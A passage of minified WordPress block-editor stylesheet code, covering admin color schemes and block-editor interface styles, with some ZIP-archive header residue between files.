(min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!pAdist/block-editor/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-editor-autocompleters__block{white-space:nowrap}.block-editor-autocompleters__block .block-editor-block-icon{margin-right:8px}.block-editor-autocompleters__block[aria-selected=true] .block-editor-block-icon{color:inherit!important}.block-editor-autocompleters__link{white-space:nowrap}.block-editor-autocompleters__link .block-editor-block-icon{margin-right:8px}.block-editor-global-styles-background-panel__inspector-media-replace-container{border:1px solid #ddd;border-radius:2px;grid-column:1/-1;position:relative}.block-editor-global-styles-background-panel__inspector-media-replace-container.is-open{background-color:#f0f0f0}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item{border:0;flex-grow:1}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{display:block}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__inspector-preview-inner{height:100%}.block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown{display:block}.block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown .block-editor-global-styles-background-panel__dropdown-toggle{height:40px}.block-editor-global-styles-background-panel__image-tools-panel-item{border:1px solid #ddd;grid-column:1/-1;position:relative}.block-editor-global-styles-background-panel__image-tools-panel-item .components-drop-zone__content-icon{display:none}.block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{display:block}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button{color:#1e1e1e;display:block;width:100%}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:hover{color:var(--wp-admin-theme-color)}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading{height:100%;padding:10px 0 0;position:absolute;width:100%;z-index:1}.block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading svg{margin:0}.block-editor-global-styles-background-panel__dropdown-toggle{background:#0000;border:none;cursor:pointer;height:100%;padding-left:12px;padding-right:32px;width:100%}.block-editor-global-styles-background-panel__reset{margin:auto 8px;opacity:0;position:absolute;right:0;top:8px}@media not (prefers-reduced-motion){.block-editor-global-styles-background-panel__reset{transition:opacity .1s ease-in-out}}.block-editor-global-styles-background-panel__reset.block-editor-global-styles-background-panel__reset{border-radius:2px}.block-editor-global-styles-background-panel__dropdown-toggle:hover+.block-editor-global-styles-background-panel__reset,.block-editor-global-styles-background-panel__reset:focus,.block-editor-global-styles-background-panel__reset:hover{opacity:1}@media (hover:none){.block-editor-global-styles-background-panel__reset{opacity:1}}.block-editor-global-styles-background-panel__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-editor-global-styles-background-panel__inspector-preview-inner .block-editor-global-styles-background-panel__inspector-image-indicator-wrapper{height:20px;min-width:auto;width:20px}.block-editor-global-styles-background-panel__inspector-image-indicator{background-size:cover;border-radius:50%;display:block;height:20px;position:relative;width:20px}.block-editor-global-styles-background-panel__inspector-image-indicator:after{border:1px solid #0000;border-radius:50%;bottom:-1px;box-shadow:inset 0 0 0 1px #0003;box-sizing:inherit;content:"";left:-1px;position:absolute;right:-1px;top:-1px}.block-editor-global-styles-background-panel__dropdown-content-wrapper{min-width:260px;overflow-x:hidden}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker-wrapper{background-color:#f0f0f0;border:1px solid #ddd;border-radius:2px;width:100%}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker__media--image{max-height:180px}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker:after{content:none}.modal-open .block-editor-global-styles-background-panel__popover{z-index:159890}.block-editor-global-styles-background-panel__media-replace-popover .components-popover__content{width:226px}.block-editor-global-styles-background-panel__media-replace-popover .components-button{padding:0 8px}.block-editor-global-styles-background-panel__media-replace-popover .components-button .components-menu-items__item-icon.has-icon-right{margin-left:16px}.block-editor-block-alignment-control__menu-group .components-menu-item__info{margin-top:0}iframe[name=editor-canvas]{box-sizing:border-box;display:block;height:100%;width:100%}@media not (prefers-reduced-motion){iframe[name=editor-canvas]{transition:all .4s cubic-bezier(.46,.03,.52,.96)}}iframe[name=editor-canvas]{background-color:var(--wp-editor-canvas-background)}.block-editor-block-icon{align-items:center;display:flex;height:24px;justify-content:center;width:24px}.block-editor-block-icon.has-colors svg{fill:currentColor}@media (forced-colors:active){.block-editor-block-icon.has-colors svg{fill:CanvasText}}.block-editor-block-icon svg{max-height:24px;max-width:24px;min-height:20px;min-width:20px}.block-editor-block-inspector p:not(.components-base-control__help){margin-top:0}.block-editor-block-inspector h2,.block-editor-block-inspector h3{color:#1e1e1e;font-size:13px;margin-bottom:1.5em}.block-editor-block-inspector .block-editor-html-element-control:where(:not(:last-child)),.block-editor-block-inspector .block-editor-image-size-control:where(:not(:last-child)),.block-editor-block-inspector .components-base-control:where(:not(:last-child)),.block-editor-block-inspector .components-radio-control:where(:not(:last-child)){margin-bottom:16px}.block-editor-block-inspector .block-editor-html-element-control .components-base-control,.block-editor-block-inspector .block-editor-image-size-control .components-base-control,.block-editor-block-inspector .components-focal-point-picker-control .components-base-control,.block-editor-block-inspector .components-query-controls .components-base-control,.block-editor-block-inspector .components-range-control .components-base-control{margin-bottom:0}.block-editor-block-inspector .components-panel__body{border:none;border-top:1px solid #e0e0e0;margin-top:-1px}.block-editor-block-inspector__no-block-tools,.block-editor-block-inspector__no-blocks{background:#fff;display:block;font-size:13px;padding:32px 16px;text-align:center}.block-editor-block-inspector__no-block-tools{border-top:1px solid #ddd}.block-editor-block-inspector-edit-contents-button{justify-content:center;margin-top:8px}.block-editor-block-list__insertion-point{bottom:0;left:0;position:absolute;right:0;top:0}.block-editor-block-list__insertion-point-indicator{background:var(--wp-admin-theme-color);border-radius:2px;opacity:0;position:absolute;transform-origin:center;will-change:transform,opacity}.block-editor-block-list__insertion-point.is-vertical>.block-editor-block-list__insertion-point-indicator{height:4px;top:calc(50% - 2px);width:100%}.block-editor-block-list__insertion-point.is-horizontal>.block-editor-block-list__insertion-point-indicator{bottom:0;left:calc(50% - 2px);top:0;width:4px}.block-editor-block-list__insertion-point-inserter{display:none;position:absolute;will-change:transform}@media (min-width:480px){.block-editor-block-list__insertion-point-inserter{display:flex}}.block-editor-block-list__insertion-point-inserter{justify-content:center;left:calc(50% - 12px);top:calc(50% - 12px)}.block-editor-block-list__block-side-inserter-popover .components-popover__content>div{pointer-events:none}.block-editor-block-list__block-side-inserter-popover .components-popover__content>div>*{pointer-events:all}.block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter{line-height:0;position:absolute;right:0;top:0}.block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter:disabled{display:none}.block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{background:#1e1e1e;color:#fff;height:24px;min-width:24px;padding:0}.block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{background:var(--wp-admin-theme-color)}.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{background:#1e1e1e}@keyframes hide-during-dragging{to{position:fixed;transform:translate(9999px,9999px)}}.components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar{border:1px solid #1e1e1e;border-radius:2px;margin-bottom:8px;margin-top:8px;overflow:visible;pointer-events:all;position:static;width:auto}.components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{margin-left:56px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{margin-left:0}.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar{overflow:visible}.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar,.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar-group{border-right-color:#1e1e1e}.components-popover.block-editor-block-list__block-popover.is-insertion-point-visible{visibility:hidden}.is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{opacity:0}@media not (prefers-reduced-motion){.is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{animation:hide-during-dragging 1ms linear forwards}}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{left:-57px;position:absolute}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector:before{content:""}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{background-color:#fff;border:1px solid #1e1e1e;padding-left:6px;padding-right:6px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{padding-left:12px;padding-right:12px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{left:auto;margin-left:-1px;position:relative}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-mover__move-button-container,.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar__block-controls .block-editor-block-mover{border-left:1px solid #1e1e1e}.is-dragging-components-draggable .components-tooltip{display:none}.components-popover.block-editor-block-popover__inbetween .block-editor-button-pattern-inserter__button{left:50%;pointer-events:all;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%)}.block-editor-block-tools--is-dragging>.popover-slot{display:none}.block-editor-block-lock-modal{z-index:1000001}.block-editor-block-lock-modal__options{border:0;margin:0;padding:0}.block-editor-block-lock-modal__options legend{margin-bottom:16px;padding:0}.block-editor-block-lock-modal__checklist{list-style:none;margin:0;padding:0}.block-editor-block-lock-modal__options-all{padding:12px 0}.block-editor-block-lock-modal__options-all .components-checkbox-control__label{font-weight:600}.block-editor-block-lock-modal__checklist-item{align-items:center;display:flex;gap:12px;justify-content:space-between;margin-bottom:0;padding:12px 0 12px 32px}.block-editor-block-lock-modal__checklist-item .block-editor-block-lock-modal__lock-icon{flex-shrink:0;margin-right:12px;fill:#1e1e1e}.block-editor-block-lock-modal__checklist-item:hover{background-color:#f0f0f0;border-radius:2px}.block-editor-block-lock-modal__template-lock{border-top:1px solid #ddd;margin-top:16px;padding-top:16px}.block-editor-block-lock-modal__actions{margin-top:24px}.block-editor-block-lock-toolbar .components-button.has-icon{min-width:36px!important}.block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{margin-left:-6px!important}.show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{border-left:1px solid #1e1e1e;margin-left:6px!important;margin-right:-6px}.block-editor-block-allowed-blocks-control:not(:only-child){margin-top:16px}.block-editor-block-allowed-blocks-control__button{justify-content:center;width:100%}.block-editor-block-allowed-blocks-modal{z-index:1000001}.block-editor-block-allowed-blocks-modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:-32px;left:0;margin:0 -32px -32px;padding:16px 32px;position:sticky;z-index:1}.block-editor-block-breadcrumb{list-style:none;margin:0;padding:0}.block-editor-block-breadcrumb li{display:inline-flex;margin:0}.block-editor-block-breadcrumb li .block-editor-block-breadcrumb__separator{fill:currentColor;margin-left:-4px;margin-right:-4px;transform:scaleX(1)}.block-editor-block-breadcrumb li:last-child .block-editor-block-breadcrumb__separator{display:none}.block-editor-block-breadcrumb__current{cursor:default}.block-editor-block-breadcrumb__button.block-editor-block-breadcrumb__button,.block-editor-block-breadcrumb__current{color:#1e1e1e;font-size:inherit;padding:0 8px}.block-editor-block-card{align-items:flex-start;color:#1e1e1e;display:flex;padding:16px}.block-editor-block-card__title{align-items:center;display:flex;flex-wrap:wrap;font-weight:500;gap:4px 8px}.block-editor-block-card__title.block-editor-block-card__title{font-size:13px;line-height:1.4;margin:0}.block-editor-block-card__name{padding:3px 0}.block-editor-block-card .block-editor-block-icon{flex:0 0 24px;height:24px;margin-left:0;margin-right:12px;width:24px}.block-editor-block-card.is-synced .block-editor-block-icon{color:var(--wp-block-synced-color)}.block-editor-block-compare{height:auto}.block-editor-block-compare__wrapper{display:flex;padding-bottom:16px}.block-editor-block-compare__wrapper>div{display:flex;flex-direction:column;justify-content:space-between;max-width:600px;min-width:200px;padding:0 16px 0 0;width:50%}.block-editor-block-compare__wrapper>div button{float:right}.block-editor-block-compare__wrapper .block-editor-block-compare__converted{border-left:1px solid #ddd;padding-left:15px;padding-right:0}.block-editor-block-compare__wrapper .block-editor-block-compare__html{border-bottom:1px solid #ddd;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:12px;line-height:1.7;padding-bottom:15px}.block-editor-block-compare__wrapper .block-editor-block-compare__html span{background-color:#e6ffed;padding-bottom:3px;padding-top:3px}.block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__added{background-color:#acf2bd}.block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__removed{background-color:#cc1818}.block-editor-block-compare__wrapper .block-editor-block-compare__preview{padding:16px 0 0}.block-editor-block-compare__wrapper .block-editor-block-compare__preview p{font-size:12px;margin-top:0}.block-editor-block-compare__wrapper .block-editor-block-compare__action{margin-top:16px}.block-editor-block-compare__wrapper .block-editor-block-compare__heading{font-size:1em;font-weight:400;margin:.67em 0}.block-editor-block-draggable-chip-wrapper{left:0;position:absolute;top:-24px}.block-editor-block-draggable-chip{background-color:#1e1e1e;border-radius:2px;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;color:#fff;cursor:grabbing;display:inline-flex;height:48px;padding:0 13px;position:relative;-webkit-user-select:none;user-select:none;width:max-content}.block-editor-block-draggable-chip svg{fill:currentColor}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content{justify-content:flex-start;margin:auto}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item{margin-right:6px}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item:last-child{margin-right:0}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content .block-editor-block-icon svg{min-height:18px;min-width:18px}.block-editor-block-draggable-chip .components-flex__item{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{align-items:center;background-color:initial;bottom:0;display:flex;justify-content:center;left:0;opacity:0;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{transition:all .1s linear .1s}}.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled .block-editor-block-draggable-chip__disabled-icon{background:#0000 linear-gradient(-45deg,#0000 47.5%,#fff 0,#fff 52.5%,#0000 0);border-radius:50%;box-shadow:inset 0 0 0 1.5px #fff;display:inline-block;height:20px;padding:0;width:20px}.block-draggable-invalid-drag-token .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{background-color:#757575;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;opacity:1}.block-editor-block-manager__no-results{font-style:italic;padding:24px 0;text-align:center}.block-editor-block-manager__category{margin:0 0 24px}.block-editor-block-manager__category-title{background-color:#fff;padding:16px 0;position:sticky;top:-4px;z-index:1}.block-editor-block-manager__category-title .components-checkbox-control__label{font-weight:600}.block-editor-block-manager__checklist{margin-top:0}.block-editor-block-manager__category-title,.block-editor-block-manager__checklist-item{border-bottom:1px solid #ddd}.block-editor-block-manager__checklist-item{align-items:center;display:flex;justify-content:space-between;margin-bottom:0;padding:8px 0 8px 16px}.components-modal__content .block-editor-block-manager__checklist-item.components-checkbox-control__input-container{margin:0 8px}.block-editor-block-manager__checklist-item .block-editor-block-icon{margin-right:10px;fill:#1e1e1e}.block-editor-block-manager__results{border-top:1px solid #ddd}.block-editor-block-manager__disabled-blocks-count+.block-editor-block-manager__results{border-top-width:0}.block-editor-block-mover__move-button-container{border:none;display:flex;justify-content:center;padding:0}@media (min-width:600px){.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{flex-direction:column}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>*{height:20px;min-width:0!important;width:100%}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>:before{height:calc(100% - 4px)}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{flex-shrink:0;top:3px}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{bottom:3px;flex-shrink:0}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{width:48px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container>*{min-width:0!important;overflow:hidden;width:24px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button{padding-left:0;padding-right:0}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{left:5px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{right:5px}}.block-editor-block-mover__drag-handle{cursor:grab}@media (min-width:600px){.block-editor-block-mover__drag-handle{min-width:0!important;overflow:hidden;width:24px}.block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon.has-icon{padding-left:0;padding-right:0}}.components-button.block-editor-block-mover-button{overflow:hidden}.components-button.block-editor-block-mover-button:before{border-radius:2px;content:"";display:block;height:32px;left:8px;position:absolute;right:8px;z-index:-1}@media not (prefers-reduced-motion){.components-button.block-editor-block-mover-button:before{animation:components-button__appear-animation .1s ease;animation-fill-mode:forwards}}.components-button.block-editor-block-mover-button:focus,.components-button.block-editor-block-mover-button:focus:before,.components-button.block-editor-block-mover-button:focus:enabled{box-shadow:none;outline:none}.components-button.block-editor-block-mover-button:focus-visible:before{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-navigation__container{min-width:280px}.block-editor-block-navigation__label{color:#757575;font-size:11px;font-weight:500;margin:0 0 12px;text-transform:uppercase}.block-editor-block-patterns-list__list-item{cursor:pointer;margin-bottom:16px;position:relative}.block-editor-block-patterns-list__list-item.is-placeholder{min-height:100px}.block-editor-block-patterns-list__list-item[draggable=true]{cursor:grab}.block-editor-block-patterns-list__item{height:100%;outline:0;scroll-margin-bottom:56px;scroll-margin-top:24px}.block-editor-block-patterns-list__item .block-editor-block-patterns-list__item-title{flex-grow:1;font-size:12px;text-align:left}.block-editor-block-patterns-list__item .block-editor-block-preview__container{align-items:center;border-radius:4px;display:flex;overflow:hidden}.block-editor-block-patterns-list__item .block-editor-block-preview__container:after{border-radius:4px;outline:1px solid #0000001a;outline-offset:-1px}@media not (prefers-reduced-motion){.block-editor-block-patterns-list__item .block-editor-block-preview__container:after{transition:outline .1s linear}}.block-editor-block-patterns-list__item.is-selected .block-editor-block-preview__container:after{outline-color:#1e1e1e;outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}.block-editor-block-patterns-list__item:hover .block-editor-block-preview__container:after{outline-color:#0000004d}.block-editor-block-patterns-list__item[data-focus-visible] .block-editor-block-preview__container:after{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-details:not(:empty){align-items:center;margin-top:8px;padding-bottom:4px}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper{height:24px;min-width:24px}.block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper .block-editor-patterns__pattern-icon{fill:var(--wp-block-synced-color)}.block-editor-patterns__grid-pagination-wrapper .block-editor-patterns__grid-pagination{border-top:1px solid #2f2f2f;justify-content:center;padding:4px}.show-icon-labels .block-editor-patterns__grid-pagination-button{width:auto}.show-icon-labels .block-editor-patterns__grid-pagination-button span{display:none}.show-icon-labels .block-editor-patterns__grid-pagination-button:before{content:attr(aria-label)}.components-popover.block-editor-block-popover{margin:0!important;pointer-events:none;position:absolute;z-index:31}.components-popover.block-editor-block-popover .components-popover__content{margin:0!important;min-width:auto;overflow-y:visible;width:max-content}.components-popover.block-editor-block-popover:not(.block-editor-block-popover__inbetween,.block-editor-block-popover__drop-zone,.block-editor-block-list__block-side-inserter-popover) .components-popover__content *{pointer-events:all}.components-popover.block-editor-block-popover__inbetween,.components-popover.block-editor-block-popover__inbetween *{pointer-events:none}.components-popover.block-editor-block-popover__inbetween .is-with-inserter,.components-popover.block-editor-block-popover__inbetween .is-with-inserter *{pointer-events:all}.components-popover.block-editor-block-popover__drop-zone *{pointer-events:none}.components-popover.block-editor-block-popover__drop-zone .block-editor-block-popover__drop-zone-foreground{background-color:var(--wp-admin-theme-color);border-radius:2px;inset:0;position:absolute}.block-editor-block-preview__container{overflow:hidden;position:relative;width:100%}.block-editor-block-preview__container .block-editor-block-preview__content{left:0;margin:0;min-height:auto;overflow:visible;text-align:initial;top:0;transform-origin:top left;width:100%}.block-editor-block-preview__container .block-editor-block-preview__content .block-editor-block-list__insertion-point,.block-editor-block-preview__container .block-editor-block-preview__content .block-list-appender{display:none}.block-editor-block-preview__container:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:1}.block-editor-block-rename-modal{z-index:1000001}.block-editor-block-styles__preview-panel{display:none;z-index:90}@media (min-width:782px){.block-editor-block-styles__preview-panel{display:block}}.block-editor-block-styles__preview-panel .block-editor-block-icon{display:none}.block-editor-block-styles__variants{display:flex;flex-wrap:wrap;gap:8px;justify-content:space-between}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item{box-shadow:inset 0 0 0 1px #ddd;color:#1e1e1e;display:inline-block;width:calc(50% - 4px)}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:hover{box-shadow:inset 0 0 0 1px #ddd;color:var(--wp-admin-theme-color)}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover{background-color:#1e1e1e;box-shadow:none}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active .block-editor-block-styles__item-text,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover .block-editor-block-styles__item-text{color:#fff}.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:focus,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:focus{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-styles__variants .block-editor-block-styles__item-text{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-editor-block-styles__block-preview-container,.block-editor-block-styles__block-preview-container *{box-sizing:border-box!important}.block-editor-block-switcher{position:relative}.block-editor-block-switcher .components-button.components-dropdown-menu__toggle.has-icon.has-icon{min-width:36px}.block-editor-block-switcher__no-switcher-icon,.block-editor-block-switcher__toggle{position:relative}.components-button.block-editor-block-switcher__no-switcher-icon,.components-button.block-editor-block-switcher__toggle{display:block;height:48px;margin:0}.components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.components-button.block-editor-block-switcher__toggle .block-editor-block-icon{margin:auto}.components-button.block-editor-block-switcher__no-switcher-icon{display:flex}.components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{margin-left:auto;margin-right:auto;min-width:24px!important}.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true],.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true]:hover{color:#1e1e1e}.components-popover.block-editor-block-switcher__popover .components-popover__content{min-width:300px}.block-editor-block-switcher__popover-preview-container{bottom:0;left:0;pointer-events:none;position:absolute;top:-1px;width:100%}.block-editor-block-switcher__popover-preview{overflow:hidden}.block-editor-block-switcher__popover-preview .components-popover__content{background:#fff;border:1px solid #1e1e1e;border-radius:4px;box-shadow:none;outline:none;overflow:auto;width:300px}.block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview{margin:16px 0;max-height:468px;overflow:hidden;padding:0 16px}.block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview.is-pattern-list-preview{overflow:unset}.block-editor-block-switcher__preview-title{color:#757575;font-size:11px;font-weight:500;margin-bottom:12px;text-transform:uppercase}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon{min-width:36px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle{height:48px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{height:48px;width:48px}.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{padding:12px}.block-editor-block-switcher__preview-patterns-container{padding-bottom:16px}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item{margin-top:16px}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-preview__container{cursor:pointer}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{border-radius:2px;height:100%}@media not (prefers-reduced-motion){.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{transition:all .05s ease-in-out}}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{border:1px solid #0000;position:relative}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:focus,.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) 